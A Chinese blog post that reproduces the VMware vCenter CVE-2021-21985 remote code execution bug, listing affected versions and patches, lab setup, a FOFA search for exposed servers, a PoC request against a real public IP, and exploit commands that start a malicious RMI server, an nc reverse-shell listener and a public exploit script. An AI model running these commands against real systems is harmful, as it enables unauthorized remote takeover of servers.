CVE-2021-21985 漏洞复现

已于 2022-07-01 10:25:55 修改
阅读量3.1k 收藏 3
点赞数
分类专栏: 安全漏洞 渗透实验 渗透测试 文章标签: 安全 安全漏洞 vmware 渗透测试
于 2021-08-12 14:04:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HEAVEN569/article/details/119642807
版权

CVE-2021-21985 漏洞复现

1.漏洞简介

该漏洞存在于vSphere Client(HTML5)中,由于vCenter Server中默认启用的Virtual SAN Health Check插件缺乏输入验证,拥有443端口网络访问权限的攻击者可以利用此漏洞在承载vCenter Server的操作系统上远程执行任意命令。
需要注意的是,Virtual SAN Health Check插件在所有vCenter Server中都默认启用,任何能够通过网络访问vCenter Server的未经身份验证的攻击者都可以利用这个漏洞,而无论是否使用vSAN,并且该漏洞无需用户交互即可远程利用。

漏洞等级:严重
漏洞评分:9.8
影响版本

- VMware:vCenter Server:
- 非7.0 U2b版本的7.0版本
- 非6.7 U3n版本的6.7版本
- 非6.5 U3p版本的6.5版本
- VMware:Cloud Foundation:
- 低于4.2.1版本的4.x版本
- 低于3.10.2.1版本的3.x版本

修复建议

- VMware:vCenter Server:
- 7.0版本升级到7.0 U2b
- 6.7版本升级到6.7 U3n
- 6.5版本升级到6.5 U3p
- VMware:Cloud Foundation:
- 4.x版本升级到4.2.1
- 3.x版本升级到3.10.2.1

2.靶机搭建

1.安装EXSI 6.7 链接:https://blog.51cto.com/chenjiangfeng/2409826
2.vcenter Server部署指南:

https://blog.csdn.net/qq_38028248/article/details/107712839
下载 vCenter Server
VMware vCenter Server
链接: https://cld5.irans3.com/dlir-s3/VMware-VCSA-all-7.0.0-15952498.iso
VMware-VCSA-all-7.0.0-15952498.iso档案大小: 6.42 GB
MD5: 94bb30ae83cd5f12e2eecce114d43007
SHA1: 17aa2b1ee20e977fb4f8f8391563f57c3e456361

ps:安装这个靶机最好使用好一点的电脑,反正我的电脑安装完启动环境,就像在玩ppt
在这里插入图片描述

3.漏洞复现

fofa:app="vmware-vCenter"

POC

/ui/h5-vsan/rest/proxy/service/systemProperties/getProperty
https://208.70.253.125/ui/h5-vsan/rest/proxy/service/systemProperties/getProperty

返回状态:405
在这里插入图片描述

ps:我发现cve-2021-21972漏洞和cve-2021-21985漏洞 发生的软件版本时一样的,我试了好几个存在21972漏洞的机器同样存在21985漏洞,如果需要批量测试漏洞的话,也可以尝试使用21972漏洞的poc去测试21985漏洞,如:https://github.com/QmF0c3UK/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC

EXP:

1.首先需要启动RMI:需要到https://github.com/xnianq/cve-2021-21985_exp中下载相应的.jar文件运行
启动rmi服务 java -cp JNDI-Injection-Bypass-1.0-SNAPSHOT-all.jar payloads.EvilRMIServer x.x.x.x
2.然后开启reverse shell监听
nc -lvvp 5555
最后执行exp:python3 cve-2021-21985.py https://vulip:port  rmi://x.x.x.x:1099/Exploit

ps:vulip:port 即为有漏洞的网站的网址 rmi为java启动的rmi服务的
在这里插入图片描述
参考链接:
https://blog.csdn.net/qq_40989258/article/details/118354411?ops_request_misc={“request_id”%3A"162685591116780255248675"%2C"scm"%3A"20140713.130102334.pc_blog."}
https://blog.csdn.net/qq_43645782/article/details/117743212
https://github.com/xnianq/cve-2021-21985_exp
https://github.com/QmF0c3UK/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC

声明:
本文仅限于大家技术交流和学习,严禁读者利用本博客的所有知识点进行非法操作。如果你利用文章中介绍的技术对他人造成损失,后果由您自行承担,感谢您的配合。
作者创作不容易,请大家点赞,收藏,关注支持一下。谢谢各位读者大老爷。

HEAVM
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
【技术分享】vCenter Server CVE-2021-21985 RCE分析 .pdf
09-05
【技术分享】vCenter Server CVE-2021-21985 RCE分析 业务安全 安全研究 网络安全 威胁情报 安全实践
为您的安全保驾护航:CVE-2021-21985 漏洞检测与防护工具
最新发布
gitblog_00029的博客
05-31 337
为您的安全保驾护航:CVE-2021-21985 漏洞检测与防护工具 项目地址:https://gitcode.com/alt3kx/CVE-2021-21985_PoC 1、项目介绍 该项目是针对CVE-2021-21985漏洞检测和防护工具。这是一个影响VMware vCenter Server的安全问题,由于Virtual SAN Health Check插件的输入验证不足,可能导致远程代...
漏洞学习篇:CVE漏洞复现
qq_44005305的博客
05-22 593
攻击者可以使用路径遍历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置 “要求全部拒绝” 的保护,则这些请求可能会成功。1、200份很多已经买不到的绝版电子书 2、30G安全大厂内部的视频资料 3、100份src文档 4、常见安全面试题 5、ctf大赛经典题目解析 6、全套工具包 7、应急响应笔记 8、网络安全学习路线。Apache HTTP Server 是 Apache 基础开放的流行的 HTTP 服务器。可以看见,apache是49版本的。
CVE-2021-21985 vCenter复现RCE
tesla889的博客
01-10 663
VMware在5月25日发布了CVE-2021-21985vCenter远程代码执行漏洞通告及修复版本,该漏洞允许未经身份认证的用户调用任意Bean里的任意方法,当调用一个恶意方法时会导致任意代码执行。
VM虚拟机发现严重的RCE漏洞!修复方法
w3cschools的博客
06-01 631
近日,VMware 已推出补丁以解决 vCenter Server 中的一个关键安全漏洞,攻击者可能会利用该漏洞在服务器上执行任意代码。 该问题被跟踪为 CVE-2021-21985(CVSS 分数 9.8),该问题源于 Virtual SAN ( vSAN ) 运行状况检查插件中缺少输入验证,该插件在 vCenter Server 中默认启用。“通过网络访问端口443恶意者可以利用此漏洞对底层操作系统上执行不受限制的特权命令在托管vCenter Server,” VMware的说,在其咨询。 VM
漏洞情报 | VMware vCenter Server 远程代码执行漏洞(CVE-2021-21985)
爱国小白帽
05-28 5170
点击上方 订阅话题 第一时间了解漏洞威胁 0x01 漏洞描述 VMware vCenter Server是VMware虚拟化管理平台,广泛的应用于企业私有云内网中。通过使用vCenter,管理员可以轻松的管理上百台虚拟化环境 。 2021年5月26日,360漏洞云监测到VMware官网发布安全公告。攻击者使用漏洞(CVE-2021-21985)可构造恶意请求,通过vCenter中默认开启的Virtual SAN Health Check插件造成远程代码执行漏洞。360漏洞云已经成功复现漏洞。 0x02
(复现)CVE-2021-21985 Vmware vcenter远程代码执行RCE
daxi0ng的博客
06-30 4656
0x00 简介 vSphere 是 VMware 推出的虚拟化平台套件,包含 ESXi、vCenter Server 等一系列的软件。其中 vCenter Server 为 ESXi 的控制中心,可从单一控制点统一管理数据中心的所有 vSphere 主机和虚拟机,使得 IT 管理员能够提高控制能力,简化入场任务,并降低 IT 环境的管理复杂性与成本。 0x01 漏洞概述 该漏洞由于vCenter Server默认启用的插件Virtual SAN Heal...
cve-2021-21985漏洞复现
whojoe的博客
06-09 6465
cve-2021-21985漏洞复现受影响的版本:漏洞复现后续利用参考文章 受影响的版本: VMware vCenter Server 7.0系列 < 7.0.U2b VMware vCenter Server 6.7系列 < 6.7.U3n VMware vCenter Server 6.5系列 < 6.5 U3p VMware Cloud Foundation 4.x 系列 < 4.2.1 VMware Cloud Foundation 4.x 系列 < 3.10.2.1
CVE-2021-21985 VMware vCenter Server 远程代码执行
寒星的博客
06-08 1155
漏洞简介 Vmware vSphere Client是美国威睿(Vmware)公司的一个应用软件。 vSphere Client存在安全漏洞,该漏洞由于vCenter Server默认启用的虚拟SAN健康检查插件缺乏输入验证导致底层操作系统上以不受限制的权限执行命令。 影响版本 VMware vCenter Server 7.0系列 < 7.0.U2b VMware vCenter Server 6.7系列 < 6.7.U3n VMware vCenter Server 6.5系列 < .
CVE-2021-21985VMCenterSe远程代码执行
爱国小白帽
05-26 987
报告编号:B6-2021-052602 报告来源:360CERT 报告作者:360CERT 更新日期:2021-05-26 1 漏洞简述 2021年05月26日,360CERT监测发现VMware官方发布了VMware vCenter Server远程代码执行漏洞的风险通告,该漏洞是由360 Noah Lab的安全研究员Ricter Z发现的。漏洞编号为CVE-2021-21985漏洞等级:严重,漏洞评分:9.8。 VMware vCenter Server是VMware虚拟化管理平台,广泛的应用于企业私
CVE-2021-21978:带回显版本的突破利用脚本
03-06
CVE-2021-21978 带回显版本的漏洞利用脚本,更简单的方式 0.进攻信息 VMware View Planner Web管理界面存在一个上传日志功能文件的入口,没有进行认证且写入的日志文件路径用户可控,通过覆盖上传日志功能文件log_upload_wsgi.py ,可以实现RCE 防御代码: def application ( environ , start_response ): logger . debug ( "application called" ) if environ [ 'REQUEST_METHOD' ] == 'POST' : post = cgi . FieldStorage ( fp = environ [ 'wsgi.input' ], environ = environ
CVE-2021-21975:[CVE-2021-21975] VMware vRealize Operations Manager API服务器端请求伪造(SSRF)
04-03
[CVE-2021-21975] VMware vRealize Operations Manager API服务器端请求伪造(SSRF) vRealize Operations(vROps)是一种工具,可将AI推动的IT运营管理从应用程序自动部署到基础架构,以优化,规划和扩展VMware Cloud和HCI部署,同时统一公共云监控。 VMware vRealize Operations Manager API 8.4 and all previous versions都容易受到服务器端请求伪造(SSRF)漏洞的攻击。 成功利用此漏洞可能导致读取或更新内部资源,并且在这种情况下,攻击者可以轻松窃取vROps服务器的管理凭据。 通过结合使用CVE-2021-21975和CVE-2021-21983 ,攻击者可以在远程vRealize Operations服务器上运行任意代码。 概念验证(
CVE-2021-26855-PoC:CVE-2021-26855的PoC攻击代码
03-12
CVE-2021-26855-PoC CVE-2021-26855的PoC漏洞利用代码。 原始代码由开发。 CVE-2021-26855 SSRF简单地使用Golang练习受影响的版本 Exchange Server 2013 is less than CU23 Exchange Server 2016 is less than CU18 Exchange Server 2019 is less than CU7 使用条件 此漏洞与以前的交换漏洞不同。 此漏洞不需要可以登录的用户身份。它可以在未经授权的情况下获取内部用户资源。 它可以与CVE-2021-27065一起使用以实现远程命令执行。 漏洞触发要求 Vulnerability in the target server The target exchange server must be a load balancing se
CVE-2021-1732研究及Exploit开发.pdf
03-30
CVE-2021-1732研究及Exploit开发,详细讲述了CVE-2021-1732的漏洞原理以及POC开发和Exploit开发,以及最终的Exp代码。来源于看雪某位大佬
检测通过“ proxylogon”组漏洞CVE-2021-26855,CVE-2021-26857,CVE-2021-26858,CVE-2021-27065)利用的Microsoft Exchange服务器上掉落的Web Shell-.NET开发
05-27
预认证SSRF,CVSS:3.0 9.1 / 8.4 CVE-2021-26857,不安全的反序列化导致特权升级到SYSTEM级别,CVSS:3.0 7.8 / 7.2 CVE-2021-26858,认证后文件写入, CVSS:3.0 7.8 / 7.2 CVE-2021-27065,认证后文件写入,CVSS...
CVE-2021-25735:利用CVE-2021-25735
05-14
CVE-2021-25735 利用CVE-2021-25735:Kubernetes验证准入Webhook绕过 设置脆弱的环境 让我们从运行脚本gencerts.sh开始以生成TLS证书和密钥。 bash gencerts.sh 要部署接纳控制器,您需要在本地构建Docker容器映像...
CVE-2021-26855
03-12
**CVE-2021-26855:Exchange Server 漏洞详解** CVE-2021-26855 是一个影响 Microsoft Exchange Server 的高严重性漏洞,该漏洞允许远程未经身份验证的攻击者执行任意代码,从而获取对目标系统的完全控制。这个漏洞...
cve-2021-3618漏洞复现
02-06
CVE-2021-3618漏洞是指影响了Mozilla Firefox浏览器的一个安全漏洞。该漏洞复现步骤如下: 1. 首先,你需要安装最新版本的Mozilla Firefox浏览器。确保你的浏览器已经更新到最新版本,因为最新版本通常会修复已知的漏洞。 2. 在Firefox浏览器中,打开一个新的标签页,并输入“about:config”(不包括引号)并按下Enter键。这将打开Firefox的高级配置页面。 3. 在搜索栏中输入“security.sandbox.content.level”(不包括引号),然后按下Enter键。你将看到一个名为“security.sandbox.content.level”的首选项。 4. 将“security.sandbox.content.level”的值更改为“0”(不包括引号)。这将禁用Firefox的内容沙箱。请注意,这将降低浏览器的安全性,请谨慎操作。 5. 关闭并重新启动Firefox浏览器,使更改生效。 6. 现在,你可以尝试复现CVE-2021-3618漏洞。使用Firefox浏览器访问一个存在安全漏洞的网站,如已知的恶意或受攻击的网站,或使用特定的payload触发漏洞。 7. 如果复现成功,可能会出现安全漏洞所导致的异常行为,比如系统崩溃、恶意代码执行等。如果没有出现异常行为,可能是因为已经修复了该漏洞或在你的环境中无法成功利用。 需要注意的是,复现CVE漏洞可能存在风险,并可能对你的计算机造成不可逆转的损害。这种操作只适用于在合法情况下进行安全测试和研究的专业人士,不推荐普通用户进行尝试。实施复现操作之前,请确认你已经了解并接受相关风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值